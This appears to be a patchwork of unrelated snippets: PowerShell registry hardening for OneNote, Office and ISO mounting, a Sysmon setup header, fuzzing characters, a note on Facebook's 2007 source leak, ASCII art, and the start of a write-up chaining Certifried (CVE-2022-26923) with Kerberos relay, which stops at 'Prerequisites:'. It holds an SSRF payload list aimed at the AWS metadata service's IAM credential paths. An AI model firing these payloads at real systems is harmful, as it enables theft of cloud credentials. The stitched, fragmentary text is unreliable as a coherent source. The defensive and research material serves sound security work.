| #Run as Administrator, copy/paste the below | |
| # Mount HKU | |
| mount -PSProvider Registry -Name HKU -Root HKEY_USERS; | |
| # Loop through each HKU/user's HKCU, AND deploy OneNote defences | |
| (gci -path "HKU:\*\Software\Microsoft\Office\*\OneNote\Options\").PsPath | | |
| Foreach-Object {New-ItemProperty -Path $_ -Name "disableembeddedfiles" -Value 1 -type DWORD -verbose}; | |
| (gci -path "HKU:\*\Software\Microsoft\Office\*\OneNote\Options\").PsPath | |
| #run as Administrator, copy/paste the below | |
| New-ItemProperty -Path "HKLM:\SOFTWARE\Classes\Windows.IsoFile\shell\mount" -Name "ProgrammaticAccessOnly" -type string -verbose; | |
| New-ItemProperty -Path "HKLM:\SOFTWARE\Classes\Windows.VhdFile\shell\mount" -Name "ProgrammaticAccessOnly" -type string -verbose |
| #run as Administrator, copy/paste the below | |
| # Mount HKU | |
| mount -PSProvider Registry -Name HKU -Root HKEY_USERS; | |
| # Loop through each HKU/user's HKCU, loop though each Office version and application, and implement defences | |
| (gci -path "HKU:\*\Software\Microsoft\Office\*\*\Security\").PsPath | | |
| Foreach-Object {Set-ItemProperty -path $_ -name "blockcontentexecutionfrominternet" -value 1 -Type DWord -verbose} |
| <# | |
| Meta | |
| Date: 2022 March 28th | |
| Authors: Dray Agha (Twitter @purp1ew0lf) | |
| Company: Huntress Labs | |
| Purpose: Automate setting up Sysmon and pulling Ippsec's sysmon IoC streamliner. Great for malware lab. | |
| #> | |
| function admin_check{ | |
| if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(` |
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |
In August 2007 a hacker found a way to expose the PHP source code on facebook.com. He retrieved two files and then emailed them to me, and I wrote about the issue:
http://techcrunch.com/2007/08/11/facebook-source-code-leaked/
It became a big deal:
http://www.techmeme.com/070812/p1#a070812p1
The two files are index.php (the homepage) and search.php (the search page)
| " _ _ " | |
| " _ /|| . . ||\ _ " | |
| " ( } \||D ' ' ' C||/ { % " | |
| " | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
| " |_\_ |----| |----| _/_|" | |
| " | |/ | | | | \| |" | |
| " | /_ | | | | _\ |" | |
| It is all fun and games until someone gets hacked! |
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites: